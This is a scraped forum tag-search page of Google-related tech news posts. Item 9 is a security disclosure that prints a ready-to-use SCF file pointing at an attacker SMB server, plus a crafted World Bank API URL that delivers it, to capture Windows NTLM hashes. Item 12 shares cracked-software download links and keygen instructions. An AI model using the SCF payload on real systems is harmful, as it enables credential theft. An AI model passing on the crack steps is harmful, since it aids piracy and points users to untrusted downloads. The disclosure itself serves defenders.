Welcome to nsane.forums

Welcome to nsane.forums, like most online communities you need to register to view parts of our community or to make contributions, but don't worry: this is a free and simple process that requires minimal information. Be a part of nsane.forums by signing in or creating an account.

  • Access special members only forums
  • Start new topics and reply to others
  • Subscribe to topics and forums to get automatic updates

Search the Community

Showing results for tags 'google'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Site Related
    • News & Updates
    • Site / Forum Feedback
    • Member Introduction
  • News
    • General News
    • FileSharing News
    • Mobile News
    • Software News
    • Security & Privacy News
    • Technology News
  • Downloads
    • nsane.down
  • General Discussions & Support
    • Filesharing Chat
    • Security & Privacy Center
    • Software Chat
    • Mobile Mania
    • Technology Talk
    • Entertainment Exchange
    • Guides & Tutorials
  • Off-Topic Chat
    • The Chat Bar
    • Jokes & Funny Stuff
    • Polling Station

Found 974 results

  1. Quick Tip Today am gonna show you how you can download your favorite Android Apps directly from Google Play Store. From the Play Store, search for your favorite app, copy the link with the app id visit apps.evozi.com/apk-downloader/ Paste the link and click generate download link. Wait for some seconds as your download link is been generated. After some few seconds, your link should be ready for download. eNJOy!!! source: thetechblog
  2. Security researchers have exposed a sophisticated hacking and disinformation campaign that targeted more than 200 Gmail users. Russian government hackers seem to have figured out that sometimes the best way to hack into people's Gmail accounts is be to abuse Google's own services. On Thursday, researchers exposed a massive Russian espionage and disinformation campaign using emails designed to trick users into giving up their passwords, a technique that's known as phishing. The hackers targeted more than 200 victims, including, among others, journalists and activists critical of the Russian government, as well as people affiliated with the Ukrainian military, and high-ranking officials in energy companies around the world, according to a new report. Researchers at the Citizen Lab, a digital rights research group at the University of Toronto's Munk School of Global Affairs, were able to identify all these victims following clues left in two phishing emails sent to David Satter, an American journalist and academic who's written Soviet and modern Russia, and who has been banned from the country in 2014. On October 7, Satter received a phishing email designed to look like it was coming from Google, claiming someone had stolen his password and that he should change it right away. As with seen with other phishing attacks targeting people affiliated with the Hillary Clinton campaign that led to the DNC leaks of last year, the email, however, didn't come from Google. It was actually from a group of hackers known as Fancy Bear, or APT28, whom many believe work for Russia's military intelligence, the GRU. A screenshot of the phishing email received The "Change Password" button linked to a short URL from the Tiny.cc link shortener service, a Bitly competitor. But the hackers cleverly disguised it as a legitimate link by using Google's Accelerated Mobile Pages, or AMP. This is a service hosted by the internet giant that was originally designed to speed up web pages on mobile, especially for publishers. In practice, it works by creating a copy of a website's page on Google's servers, but it also acts as an open redirect. According to Citizen Lab researchers, the hackers used Google AMP to trick the targets into thinking the email really came from Google. "It's a percentage game, you may not get every person you phish but you'll get a percentage," John Scott-Railton, a senior researcher at Citizen Lab, told Motherboard. So if the victim had quickly hovered over the button to inspect the link, they would have seen a URL that starts with google.com/amp, which seems safe, and it's followed by a Tiny.cc URL, which the user might not have noticed. (For example: https://www.google[.]com/amp/tiny.cc/63q6iy) Using Google's own redirect service was also perhaps also a way to get the phishing email past Gmail's automated filters against spam and malicious messages. "It's a percentage game, you may not get every person you phish but you'll get a percentage." According to Citizen Lab, who doesn't directly point the finger at Fancy Bear, the email was actually sent by annaablony[@]mail.com. That address was used in 2015 by Fancy Bear to register a domain, according to security firm ThreatConnect. And another domain used in the October attacks exposed by Citizen Lab was also previously linked to Fancy Bear, according to SecureWorks, which tracked the phishing campaign against the DNC and the Clinton campaign. Curiously, the email targeting Satter came just a few days before Google warned some Russian journalists and activists that "government-backed attackers" were trying to hack them using malicious Tiny.cc links. A screenshot of a phishing email received Now we know that in October of 2016, when the hackers targeted Satter and at least 200 other people, the trick of using Google AMP was working, and Google hadn't blocked it. Google has previously dismissed concerns about open redirectors, arguing that "a small number of properly monitored redirectors offers fairly clear benefits and poses very little practical risk." On Thursday, a company spokesperson said that this is a known issue and last year some Google AMP URLs started showing a warning if the company's systems are uncertain whether the link is safe to visit, such as this. But for some security researchers, they are dangerous. "The AMP service's behavior as an open redirect for desktop browsers was clearly abused in this situation and is also just trivial to abuse in general," Nicholas Weaver, a senior researcher at the International Computer Science Institute at UC Berkeley, told Motherboard in an email. "There is undoubtedly some engineering tradeoff I'm not seeing that causes them to maintain it." Google's redirectors might not be the only part of Google's infrastructure that Fancy Bear hackers have been taking advantage of. Citizen Lab researchers found a Tiny.cc URL that targeted an email address—myprimaryreger[@]gmail.com—that other security researchers suspect was used by Fancy Bear to test their own attacks. A screenshot of the Google Plus page of "myprimaryreger[@]gmail.com," an account researchers believe was controlled That address had a Google Plus page filled with images that appear in real, legitimate Gmail security alerts. It's unclear what the hackers used these for, or if they used them at all. But the researchers said that perhaps the hackers were embedding them in phishing emails, and the fact that they were hosted on Google Plus perhaps helped thwart Gmail's security controls. The Fancy Bear hackers are known to use popular services like URL shorteners in their high-profile hacking operations. And, sometimes, those URL shorteners betray them and end up revealing who they targeted. Between March 2015 and May 2016, as part of their operation to hack Clinton's campaign chairman John Podesta, and former National Security Advisor Colin Powell, the hackers targeted more than 6,000 people with more than 19,000 phishing links. Some of those used Bitly URLs that, as it turned out, could be decoded to figure out who they were intended to. An analysis of the Bitly link used to phish John Podesta Similarly, in this case Citizen Lab researchers were able to identify the victims by figuring out that there was a pattern behind how Tiny.cc creates short URLs. That pattern, as research fellow Adam Hulcoop explained to me, "was chronological." So, starting from the links sent to Satter, the researchers were able to guess other links created around the same time. It's impossible to know why the hackers keep relying on services like Bitly or Tiny.cc, which end up exposing some of their operations—although months later. One explanation could be that their phishing campaigns are highly automated, given that they target thousands of people. So, as Hulcoop put it, they need a modular phishing infrastructure where every element can be modified if needed, as "an insurance policy of sorts" and they use third party services "to try and balance the need for OpSec [operational security, or the practice of keeping operations secret] with the ability to operate at scale." "The construction of the Tiny.cc shortcodes pointing to TinyURL shortcodes, which ultimately point to phishing sites on different servers. This modularity is likely by design so that the operator can change up the individual components, servers, redirectors, etc., and only abandon the pieces that are burned," he said in an online chat. "The more layers you have, the more flexible you can be." Article source
  3. Google has a new feature Google is rolling out a cool new feature that allows you to perform searches through your personal data - from Gmail or Photos - straight from the search engine interface. First spotted by Search Engine Roundtable, this new "Personal" tab shows you content from private sources, including emails and photos you've taken and uploaded to the cloud. There's nothing particularly difficult to figure out about this new tab because it works just like any other tab on Google. You first have to type whatever it is you want to look for like "flowers," and switch to the "Personal" tab, which you can find in the "More" tab at the end of the line. There, you'll find any emails you have received featuring this word, as well as any pictures stored in your Photos account containing flowers. As mentioned, this is a tab that you'll have to look for specifically if you want to look through it, as it's not included among the main ones. Incoming to you The feature seems to be rolling out slowly to users all over the world and looks like a great and interesting addition. After all, who doesn't like to be able to search through their personal data so easily and from a single interface? The feature works on both the web and the mobile versions of Google, so you can enjoy it wherever you are and whenever it happens for you to need to find something in your personal data without opening up loads of extra apps or, depending on what device you're using, tabs. To alleviate any worries people may have, the company added a notice on this new feature which states that "only you can see these results." This, of course, should make anyone concerned with seeing their private photos in a Google box relax some. Source
  4. Chrome: Sites May Record Audio/Video Without Indication Websites may abuse WebRTC in Google Chrome to record audio or video using the technology without any indication of that to the user. A security vulnerability was reported to Google on April 10, 2017 which allows an attacker to record audio or video using Chrome without indication. Most modern web browsers support WebRTC (Web Real-Time Communications). One of the benefits of WebRTC is that it supports real-time communication without the use of plugins. This includes options to create audio and video chat services, p2p data sharing, screen sharing, and more using the technology. There is also a downside to WebRTC, as it may leak local IP addresses in browsers that support WebRTC. You can protect the IP address from being revealed in Firefox, Chrome and Vivaldi, for instance. The reported vulnerability affects Chrome but it may affect other web browsers as well. For it to work, you'd have to visit a site and allow it to use WebRTC. The site that wants to record audio or video would spawn a JavaScript window then without header, a pop under or pop up window for instance. It can then record audio or video, without giving indications in Chrome that this is happening. Chrome displays recording indicators usually in the tab that uses the functionality, but since the JavaScript window is headerless, nothing is shown to the user. A proof of concept was created which you find linked on the Chromium Bugs website. All you need to do is click on two buttons, and allow the site to use WebRTC in the web browser. The proof of concept demo records audio for 20 seconds, and gives you an option afterwards to download the recording to the local system. A Chromium team member confirmed the existence of the issue, but did not want to call it vulnerability. The explanation does not make a whole lot of sense to me. Because Android does not show an indicator in first place, and Chrome on the desktop only if enough interface space is available, it is not a security vulnerability? At the very least, it is a privacy issue and something that users need to be aware of. While users do have to trust sites enough to give them permissions to use WebRTC, it and the fact that the site needs to launch a popup window are the only things needed to exploit this. Google may improve the situation in the future, but users are on their own right now when it comes to that. The best form of protection is to disable WebRTC which can be done easily if you don't require it, the second best to allow only trusted sites to use WebRTC. If you allow a site to use WebRTC, you may want to look out for any other windows that it may spawn afterwards on top of that. Now You: Do you use services or apps that use WebRTC? Source
  5. Google has removed 41 Android apps from the official Play Store. The apps were infected with a new type of malware named Judy, and experts estimate the malware infected between 8.5 and 36.5 million users. According to researchers from Check Point, the apps were available on the Play Store for years, but have been clean and virus-free for most of the time. It appears that starting with April 2016, the apps were slowly updated with malicious code. The purpose of this code was to launch a browser app, load an URL, and use JavaScript to locate and click on specific banners that would bring profits to the malware's creators. One company behind most malicious apps According to Check Point, almost all malicious apps were made by a South Korean company called Kiniwini, but registered on the Google Play Store as ENISTUDIO corp. It is unclear if the company added the malicious code itself, or its servers were compromised and the code added by a third-party. Furthermore, besides the hidden ad-clicking activity, the operators of the Judy malware used it to insert intrusive ads in other apps, almost to the point that users had no possibility of viewing or interacting with the original app's content. A list of apps infected with the Judy Android malware is available here. Despite apps going through periodic reviews, Google's Play Store security system, named Bouncer, wasn't able to pick up the malware's malicious activity. Nonetheless, help is coming! Google launches new Android security services On May 17, during the Google I/O annual event, Google announced a new service called Google Play Protect. According to Google, this new service continuously scans all Android apps and user devices for malicious behavior and uses machine learning to detect any suspicious activity. Once it detects a malicious app, it removes it from the phones of all users who installed it. The new Google Play Protect service suite is currently shipping to all devices with the Google Play app installed. Source
  6. Chrome Home is an experimental feature of Chrome for Android that makes major changes to the mobile browser when enabled. Chrome has the reputation of being a very stable browser, one that is kept more or less like it is in regards to the user interface and functionality. While that is certainly the case, Google has worked on modifications to the user interface of the browser all the time in the past. Most of these experiments are not disclosed to users of the browser, while some are launched as experiments to get feedback on them before the decision is made to roll them out to all users, or throw them in the garbage bin. Chrome Home Chrome Home is such a new feature. Unlike other interface modifications or changes in the past, it is a major one. It changes the browser's New Tab Page, but also the main toolbar of Chrome, as it moves it from the top to the bottom of the browser screen. Note that the new feature is only available in beta releases of Chrome right now (Chrome Beta, Chrome Canary, Chrome Dev) First, lets take a look at how you can enable the new Chrome Home feature: Open Google Chrome Dev on your Android device (may also work with Canary and Beta already). Type chrome://flags in the browser's address bar and tap on the submit button to load the address. Locate Chrome Home on the page. The easiest way to do that is to tap on menu, select Find on Page, and enter Chrome Home to jump to the flag right away. Tap on the default menu underneath the Chrome Home flag, and set it to enabled once the selection menu comes up. You are asked to restart Google Chrome at this point to apply the change. Note that there are two additional flags right now that you can enable: Chrome Home Expand Button -- which adds a button to Chrome Home that lets you expand the interface when you tap on it (you need to swipe otherwise). Chrome Home NTP Redesign -- enables the NTP (New Tab Page) redesign for Chrome Home. Chrome Home moves the browser's address bar to the bottom of the screen. This is a major move, considering that most browsers display the address bar at the top. Even if you don't mind the change, it is likely that you will need to grow accustomed to the new position, and that it will feel out of place in the beginning. The move of the address bar is the most visible, but not the only change that Chrome Home introduces. You can swipe up using the toolbar as your base for the motion to display the new tab page interface on the screen. This interface lists top sites (you visited) or popular sites, news, and links to Home, Downloads, Bookmarks and the browsing history. Tip: You can disable the popular sites by setting the flag "show popular sites on the New Tab Page" on chrome://flags to disabled. You can use the swipe motion to increase or decrease the size of the interface. Downloads, bookmarks and history display those directly; useful to manage downloads, open bookmarks, or manage the browsing history of Chrome for Android. (via Stadt Bremerhaven) Article source
  7. Tavis Ormandy, the most famous of Google's security experts, has ported Windows Defender DLLs to Linux with the aid of a new tool he released today on GitHub. The new tool is named loadlibrary, and Ormandy says he created it for the sole purpose of helping security researchers, not necessarily the Linux user community. Loadlibrary is for pen-testers and security researchers Loadlibrary's sole purpose is to allow researchers to run and load Windows DLLs on Linux together with specialized pen-testing tools called fuzz tools, or fuzzers. These tools perform an automated operation called fuzzing, which relies on feeding a software application with random data and analyzing the output for abnormalities. Google's security experts are big fans of fuzzing when searching for undocumented vulnerabilities. In the past years, Google has developed two of the most popular fuzzing tools around, namely OSS-Fuzz and syzkaller. Syzkaller is how Google engineers discovered three major bugs in the Linux kernel [1, 2, 3]. Two of these bugs had survived in the kernel code for 9 and 11 years, respectively, showing a fuzzing tool's ability to uncover bugs that humans couldn't spot during manual code reviews. Ormandy used tool to find "crazy bad" Windows flaw Earlier this month, Ormandy also used fuzzing to find a vulnerability in the Microsoft Malware Protection Engine, which he later described as "crazy bad" and "the worst Windows remote code exec in recent memory." The loadlibrary project is one of the tools Ormandy used for discovering that flaw. The default loadlibrary package Ormandy released today on GitHub includes a demo in which the researcher ported Windows Defender on Linux. More precisely, Ormandy ported the Microsoft Malware Protection Engine (MsMpEng), the security service installed by default on Windows 8, 8.1, 10, Windows Server 2016 operating systems. Of the MsMpEng package, Ormandy ported the Mpengine component, responsible for scanning and analyzing malware. Loadlibrary is not a Wine replacement Despite his demo, the researcher says loud and clear that his tool is not intended as a way to run Windows apps on Linux. "This project does not replace Wine or Winelib," Ormandy says, "Winelib is used to port Windows C++ projects to Linux, and Wine is intended to run full Windows applications. This project is intended to allow native Linux code to load simple Windows DLLs." Nonetheless, while Linux desktop users can't use loadlibrary in any way, the tool is attractive to app developers, who can use it to load DLL data into Linux apps without having to port the entire Windows app along the way. Article source
  8. Google Fuchsia UI Google’s I/O 2017 event offered the tech giant the perfect opportunity to announce projects that the company has been working on and the direction it intends to take in terms of AI and VR technology, among others. Earlier this month, images revealing a project that Google has been working on surfaced online. Details about Google Fuchsia first surfaced last year, but the recent report showed the OS’s System UI and revealed some features that it could incorporate. Android Police reported that during the Android Fireside Chat, Google’s VP of engineering for Android, Dave Burke was asked about one of the most exciting projects at Google, Fuchsia OS. The engineer said that the experimental project is at an early-stage and it’s one of the many projects that Google is working on. Fuchsia won’t replace Android or Chrome OS What sets Fuchsia apart is its open source nature, which allows developers to see the code and bring contributions to it. David Burke stated “How do you spell Fuchsia? Fuchsia is a early-stage experimental project. We, you know, we actually have lots of cool early projects at Google. I think what’s interesting here is it’s open source, so people can see it and comment on it. Like lots of early stage projects it’s gonna probably pivot and morph. There’s some really smart people on it, people we’ve worked with who are great. And so it’s kind of exciting to see what happens. But it’s definitely a different sort of independent project to android. And yeah, that’s basically it.” It’s worth noting that Google’s Fuchsia project isn’t being developed alongside Android, which means that Google doesn’t have any intention to replace Android OS or Chrome OS with this new project. Still, that doesn’t mean that the situation won’t change in the future, as Fuchsia OS gradually takes shape and becomes a stable operating system. Since it’s at the early stages of development, there’s still the possibility that it could be scraped to make way for other projects by Google. At this point, time will tell if Fuchsia OS will eventually progress to become a full-fledged OS. Source
  9. Attacks that leak authentication credentials using the SMB file sharing protocol on Windows OS are an ever-present issue, exploited in various ways but usually limited to local area networks. One of the rare research involving attacks over the Internet was presented by Jonathan Brossard and Hormazd Billimoria at the Black Hat security conference in 2015. However, there have been no publicly demonstrated SMB authentication related attacks on browsers other than Internet Explorer and Edge in the past decade. This article describes an attack which can lead to Windows credentials theft, affecting the default configuration of the most popular browser in the world today, Google Chrome, as well as all Windows versions supporting it. The problem With its default configuration, Chrome browser will automatically download files that it deems safe without prompting the user for a download location but instead using the preset one. From a security standpoint, this feature is not an ideal behavior but any malicious content that slips through still requires a user to manually open/run the file to do any damage. However, what if the downloaded file requires no user interaction to perform malicious actions? Are there file types that can do that? Windows Explorer Shell Command File or SCF (.scf) is a lesser known file type going back as far as Windows 98. Most Windows users came across it in Windows 98/ME/NT/2000/XP where it was primarily used as a Show Desktop shortcut. It is essentially a text file with sections that determine a command to be run (limited to running Explorer and toggling Desktop) and an icon file location. Taken as an example, this is how Show Desktop SCF file contents looked like: [Shell] Command=2 IconFile=explorer.exe,3 [Taskbar] Command=ToggleDesktop As with Windows shortcut LNK files, the icon location is automatically resolved when the file is shown in Explorer. Setting an icon location to a remote SMB server is a known attack vector that abuses the Windows automatic authentication feature when accessing services like remote file shares. But what is the difference between LNK and SCF from the attack standpoint? Chrome sanitizes LNK files by forcing a .download extension ever since Stuxnet but does not give the same treatment to SCF files. SCF file that can be used to trick Windows into an authentication attempt to a remote SMB server contains only two lines, as shown in the following example: [Shell] IconFile=\\170.170.170.170\icon Once downloaded, the request is triggered the very moment the download directory is opened in Windows File Explorer to view the file, delete it or work with other files (which is pretty much inevitable). There is no need to click or open the downloaded file – Windows File Explorer will automatically try to retrieve the “icon “. The remote SMB server set up by the attacker is ready to capture the victim’s username and NTLMv2 password hash for offline cracking or relay the connection to an externally available service that accepts the same kind of authentication (e.g. Microsoft Exchange) to impersonate the victim without ever knowing the password. The captured information may look like the following: [*] SMB Captured - 2017-05-15 13:10:44 +0200 NTLMv2 Response Captured from 173.203.29.182:62521 - 173.203.29.182 USER:Bosko DOMAIN:Master OS: LM: LMHASH:Disabled LM_CLIENT_CHALLENGE:Disabled NTHASH:98daf39c3a253bbe4a289e7a746d4b24 NT_CLIENT_CHALLENGE:01010000000000000e5f83e06fcdd201ccf26d91cd9e326e0000000002000000000000 0000000000 Bosko::Master:1122334455667788:98daf39c3a253bbe4a289e7a746d4b24:01010000000000000e5f83e06f cdd201ccf26d91cd9e326e00000000020000000000000000000000 The above example shows a disclosure of victim’s username, domain and NTLMv2 password hash. It is worth mentioning that SCF files will appear extensionless in Windows Explorer regardless of file and folder settings. Therefore, file named picture.jpg.scf will appear in Windows Explorer as picture.jpg. This adds to inconspicuous nature of attacks using SCF files. Impact Password disclosure For users in Active Directory domains (corporate, government and other networks), password disclosure can have various impacts ranging from escalating internal network breaches to accessing externally available NTLM-enabled services and breaches based on password reuse. For Windows 8/10 users that are using a Microsoft Account (MSA) instead of a local account, the password disclosure impacts all the Microsoft services that are integrated with the MSA SSO such as OneDrive, Outlook.com, Office 365, Office Online, Skype, Xbox Live and others. The common problem of password reuse can lead to more account breaches unrelated to MSA. Regarding password cracking feasibility, this improved greatly in the past few years with GPU-based cracking. NetNTLMv2 hashcat benchmark for a single Nvidia GTX 1080 card is around 1600 MH/s. That’s 1.6 billion hashes per second. For an 8-character password, GPU rigs of 4 such cards can go through an entire keyspace of upper/lower alphanumeric + most commonly used special characters (!@#$%&) in less than a day. With hundreds of millions leaked passwords resulted from several breaches in the past years (LinkedIn, Myspace), wordlist rule-based cracking can produce surprising results against complex passwords with more entropy. The situation is even worse for Windows XP systems and networks where backwards compatibility with NTLMv1 has been explicitly enabled. In those cases, a downgrade attack can be performed forcing the client to authenticate with a weaker hash/protocol (such as NTLMv1 or even LM) instead of NTLMv2. This enables the attacker to capture a hash which can be cracked many times faster than NTLMv2 – in the case of LM often within seconds using precomputed tables for reversing cryptographic hash functions (“Rainbow tables”). SMB relay attacks Organizations that allow remote access to services such as Microsoft Exchange (Outlook Anywhere) and use NTLM as authentication method, may be vulnerable to SMB relay attacks, allowing the attacker to impersonate the victim, accessing data and systems without having to crack the password. This was successfully demonstrated by Jonathan Brossard at the Black Hat security conference. Under certain conditions (external exposure) an attacker may even be able to relay credentials to a domain controller on the victim’s network and essentially get an internal access to the network. Antivirus Handling of SCF Naturally, when a browser fails to warn on or sanitize downloads of potentially dangerous file types, one relies on security solutions to do that work instead. We tested several leading antivirus solutions by different vendors to determine if any solution will flag the downloaded file as dangerous. All tested solutions failed to flag it as anything suspicious, which we hope will change soon. SCF file analysis would be easy to implement as it only requires inspection of IconFile parameter considering there are no legitimate uses of SCF with remote icon locations. Introducing new attack vectors Although using social engineering to entice the victim to visit the attacker’s website as well as open redirection and cross site scripting vulnerabilities on trusted websites are the most common attack vectors to deliver malicious files, for this attack I would like to add an often disregarded and lesser known vulnerability that could serve the same purpose, hoping it would bring attention to its impact. Reflected file download First described by Oren Hafif, the Reflected File Download vulnerability occurs when a specially crafted user input is reflected in the website response and downloaded by the user’s browser when the certain conditions are met. It was initially used as an attack vector to trick the user into running malicious code (usually from a Windows batch file), based on the user’s trust in the vulnerable domain. Since SCF format is rather simple and our attack requires only two lines that can be preceded and followed by (almost) anything, it creates perfect conditions to be used with RFD. RFD is usually aimed at RESTful API endpoints as they often use permissive URL mapping, which allows for setting the extension of the file in the URL path. Chrome will not download most of typical API response content types directly so these would have to be forced through a download attribute in a href=… link tags. However, there are exceptions. Chrome uses MIME-sniffing with text/plain content type and if the response contains a non-printable character it will be downloaded as a file directly and automatically unless the “nosniff” directive is set. This can be demonstrated on World Bank API, using the following URL: http://api.worldbank.org/v2/country/indicator/iwantyourhash.scf?prefix= %0A[Shell]%0AIconFile=\\170.170.170.170\test%0Alol=%0B&format=jsonp Due to the non-printable character %0B Chrome will download the response as iwantyourhash.scf file. The moment the download directory containing the file is opened Windows will try to authenticate to the remote SMB server, disclosing the victim’s authentication hashes. Due to the non-printable character %0B Chrome will download the response as iwantyourhash.scf file. The moment the download directory containing the file is opened Windows will try to authenticate to the remote SMB server, disclosing the victim’s authentication hashes. Recommendations In order to disable automatic downloads in Google Chrome, the following changes should be made: Settings -> Show advanced settings -> Check the Ask where to save each file before downloading option. Manually approving each download attempt significantly decreases the risk of NTLMv2 credential theft attacks using SCF files. As SCF files still pose a threat the measures that need to be taken depend on affected users network environment and range from simple host level hardening and configuring perimeter firewall rules to applying additional security measures such as SMB packet signing and Extended Protection. With the first two the goal is to prevent SMB traffic from leaving the corporate environment by blocking ports that can be used to initiate a connection with a potentially malicious Internet-based SMB server. When possible, SMB traffic should always be restricted to private networks. Conclusion Currently, the attacker just needs to entice the victim (using fully updated Google Chrome and Windows) to visit his web site to be able to proceed and reuse victim’s authentication credentials. Even if the victim is not a privileged user (for example, an administrator), such vulnerability could pose a significant threat to large organisations as it enables the attacker to impersonate members of the organisation. Such an attacker could immediately reuse gained privileges to further escalate access and perform attacks on other users or gain access and control of IT resources. We hope that the Google Chrome browser will be updated to address this flaw in the near future. Article source
  10. Google takes steps to increase security Following the famous Gmail phishing attack from just a few days ago, Google has decided to make it more difficult for apps to get access to people's data. The company announced that new applications that request access to user data will, from now on, face more scrutiny. Some of these apps may even "qualify" for a manual review due to Google's enhanced risk assessment. “Until the review is complete, users will not be able to approve the data permissions, and we will display an error message instead of the permissions consent page. You can request a review during the testing phase in order to open the app to the public. We will try to process those reviews in 3-7 business days. In the future, we will enable review requests during the registration phase as well,” Google informs developers. Developers will continue to use their apps for testing purposes even before they get approved. They'll need to log in with an account registered as owner or editor of the project in the Google API Console. From there, they'll be able to add more testers and to start the review process. To add an extra layer of security, Google has updated the app identity guidelines. In them, it states that apps must not mislead users, which also indicates that they need to have unique names and not copy other apps, which is something that has happened countless times already. “These changes may add some friction and require more time before you are able to publish your web application, so we recommend that you plan your work accordingly,” Google says. Multiple changes to increase security The changes come as a result of the attack that took place a few weeks ago. Gmail users started receiving phishing emails pretending to be from someone they know who was looking to share content with them on Google Docs. A link took people to a login page where a fake Google Docs app requested permission to people's contacts and emails. The attack was stopped within an hour and the company said that less than 0.1% of Gmail users were even impacted by the incident. The company has already tighten OAuth rules, it's anti-spam systems, and more. Source
  11. Google was hit by a phishing attack last week, as attackers used Google’s web app platform to publish an app seemingly named as ‘Google Docs’, tricking users into thinking that it’s the legitimate Google service. It took a mere three hours for Google to blacklist the offending web app; the next day, Google rolled out an update for Gmail to better warn users about phishing links. Today, the Mountain View giant has announced an update to its approach with regards to the publishing process for web apps that request user data. The company notes that while its API’s user data policy states that “apps must not mislead users” and that their names “should be unique to [the] application and should not copy others”, the process of enforcing this policy have been lackluster. To fix that, Google is updating its web app publishing process, its risk assessment systems, as well as the user-facing consent page for apps. As far as the average user is concerned – nothing changes. But, developers might notice delays in publishing or modifying their web apps. As an example, subject to how the new risk assessment process feels about a web app, some web apps might require a manual review by Google before publishing publicly. Developers will have to manually request said review during an app’s testing phase, and Google may take up to 7 days to give its nod; until approved, the app will only work for the owner, editor, and additional testers. The average user will not be able to provide permission to use their data until an app has been approved. These changes are sure to help prevent a repeat of such phishing attacks. Google didn’t state if any more changes were coming to the user-facing consent page, but hopefully, a change to highlight the app publisher’s name more prominently is in the works. Source
  12. Gmail Notifier Pro - the program to alert you when new mail in service Gmail. However, Gmail Notifier is more than just a tool for warning, it can be used to check the mail, as well as create new messages from the desktop interface, the choice of the type of account (Google Gmail Atom, Google Gmail IMAP, Google Calendar, subscribe to a feed and Google Reader ) and much more. You can also keep track of multiple accounts from Gmail. After installing the software, open the Options and set the account Gmail. You can use the method of both Atom and IMAP. After setting, you can see all the messages in the main window and a separate window allows you to view the contents of your email. Every time when a new e-mail message, you will receive a notification with the desktop will look pretty cool. The program supports themes that can be customized from the window Options. Set up a notifier so you more like it. When you need to create a new message, just click on the Compose New Email option in the system tray. Features: Gmail Notifier Pro provides many easy-to-use and settings. Checking multiple Gmail accounts for new mail - including Google Apps accounts. Displays pop-up notifications and plays audio message alerting the user when new mail arrives. A complete overview of all unread messages in all your inboxes. Support Atom and IMAP protocols. Allows you to create and respond to email without opening a browser. Integration with Google Contacts. Website: http://www.gmailnotifier.se Release date: 14 May 2017 OS: Windows XP / Vista / 7 / 8 /10 Language: ML Changelog: Download setup Download portable Installer + Fix: Site: https://cloud.mail.ru Sharecode: /public/5Gu2/bP9EQYCMh Installer + Fix + Portable: Note: Just copy the link and sharecode together and then press enter. You need to enter the credentials as mentioned in main post. The d/w starts immediately. Site: http://95.141.193.17 Sharecode: /noload2/files/061/Gmail.Notifier.rar Usrname: rsload.net Pwd: rsload.net Noy medicine - shared by Siddharta N.B. - shared by Siddharta If you're looking for ConfigDat.xml >>> open run (Windows logo + R) and type: %appdata%\GmailNotifierPro Then replace with keygen registration <RegisteredUser><Name>XXXXX YYYYYY</Name><EMail>[email protected]</EMail><RegistrationCode>4ACXXXXXXXXXXX3EC1</RegistrationCode></RegisteredUser> Note: The xxxx (yyyyy)is personal data or names My Crack Gmail Notifier Pro 5.3.5 - by bb2018: Site: https://www.upload.ee Sharecode[?]: /files/7008428/Crack-Gmail_Notifier_Pro_5.3.5_.rar.html
  13. Google, Facebook and Twitter sued for San Bernardino terrorist attack Social media companies Facebook and Twitter, as well as Google, are being sued for allegedly enabling ISIS to spread its extremist messages ahead of the San Bernardino attack of 2015. The families of three victims are behind the lawsuit, which claims that these companies aided and abetted the terrorist attacks and are, therefore, liable for wrongful death, reports the Los Angeles Times. "Even if Farook and Malik had never been directly in contact with ISIS, ISIS' use of social media directly influenced their actions on the day of the San Bernadino massacre," reads the lawsuit, referring to Syed Rizwan Farook and Tashfeen Malik. The two were known ISIS supporters and pledged their allegiance to the group on Facebook ahead of the attack. The main idea behind the lawsuit is that because Facebook, Twitter and Google's YouTube allow everyone, including ISIS members, to post on their platforms, they are somehow at fault for indoctrinating the couple. A flawed and dangerous idea This seems like the type of lawsuit that will get thrown out quite quickly, mainly because there are billions of people using social media. Facebook is heading towards the 2 billion milestone, Twitter has over 315 million monthly users and Google is probably used by most people with an Internet access, except for those where other similar tools are available and locally promoted, like China. YouTube, for its part, doesn't necesarily have a number of users who view content, but it does release the number of hours watched by users every month - 3.25 billion. Among these billions of people who use three of some of the most popular tools on the Internet, there are some bad seeds, of course, including ISIS members and other extremists. Most of these people are aware of ISIS and haven't gone to the dark side just because they exist and promote their content online. And for the record, their content does get removed and their accounts shut down. The companies, logically, deny liability and say that it's a tenuous and potentially very dangerous chain of blame that led to them being sued. Basically, any social network can be blamed for terrorism around the world simply because the attackers may have had the smallest connection to the platform. That idea is deeply flawed. Source
  14. In the last five months, Google’s OSS-Fuzz program has unearthed over 1,000 bugs in 47 open source software projects, and it’s ready to integrate even more of them. Fuzzing open source Software flaws can end up creating security vulnerabilities, and undermine the security of the open source foundation of many apps, sites, services, and networked things. Launched in December 2016, OSS-Fuzz aims to provide continuous fuzzing for select core open source software. “OSS-Fuzz’s goal is to make common software infrastructure more secure and stable by combining modern fuzzing techniques with scalable distributed execution,” Google explained. “OSS-Fuzz combines various fuzzing engines (initially, libFuzzer) with Sanitizers (initially, AddressSanitizer) and provides a massive distributed execution environment powered by ClusterFuzz.” The program has been a success So far, OSS-Fuzz has found a total of 264 potential security vulnerabilities: 7 in Wireshark, 33 in LibreOffice, 8 in SQLite 3, 17 in FFmpeg – and the list goes on. “Fuzzing not only finds memory safety related bugs, it can also find correctness or logic bugs,” Google’s engineers noted. “Once a project is integrated into OSS-Fuzz, the continuous and automated nature of OSS-Fuzz means that we often catch these issues just hours after the regression is introduced into the upstream repository, before any users are affected.” Pushing for greater adoption of fuzzing in software development Google wants even more open source projects to reap the benefit of fuzzing, and has put out a call for more projects to participate in the program. This time, though, there’s added incentive. “Combined with fixing all the issues that are found, this is often a significant amount of work for developers who may be working on an open source project in their spare time. To support these projects, we are expanding our existing Patch Rewards program to include rewards for the integration of fuzz targets into OSS-Fuzz.” For now, only software projects that have large user base and/or are critical to global IT infrastructure need apply, and they can rack up to $20,000, depending on the “quality” of their fuzz targets. Article source
